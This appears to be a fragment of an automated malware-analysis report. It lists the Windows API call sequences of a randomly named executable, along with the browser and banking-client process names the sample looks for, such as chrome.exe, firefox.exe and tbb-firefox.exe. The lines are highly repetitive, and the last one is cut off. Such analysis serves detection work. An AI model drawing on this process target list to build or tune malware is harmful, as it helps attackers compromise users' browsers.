Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe29_2_012B6CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: GetCommandLineA,StrStrIA,memset,#680,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,strstr,strstr,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree, \iexplore.exe29_2_012B1900
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012A3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012A3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: memset,GetModuleFileNameA,CreateMutexA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,#680,#680,PathFindFileNameA,StrStrIA,#680,StrStrIA,#680,StrStrIA, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex29_2_012A3610
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_011278A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_011278A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,HeapAlloc,LeaveCriticalSection,Process32Next,GetHandleInformation,CloseHandle, iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex31_2_011278A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe31_2_01126CA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,CreateMutexA,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,CreateMutexA,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetNamedSecurityInfoA,LocalFree,InitializeCriticalSection,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,#680,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,G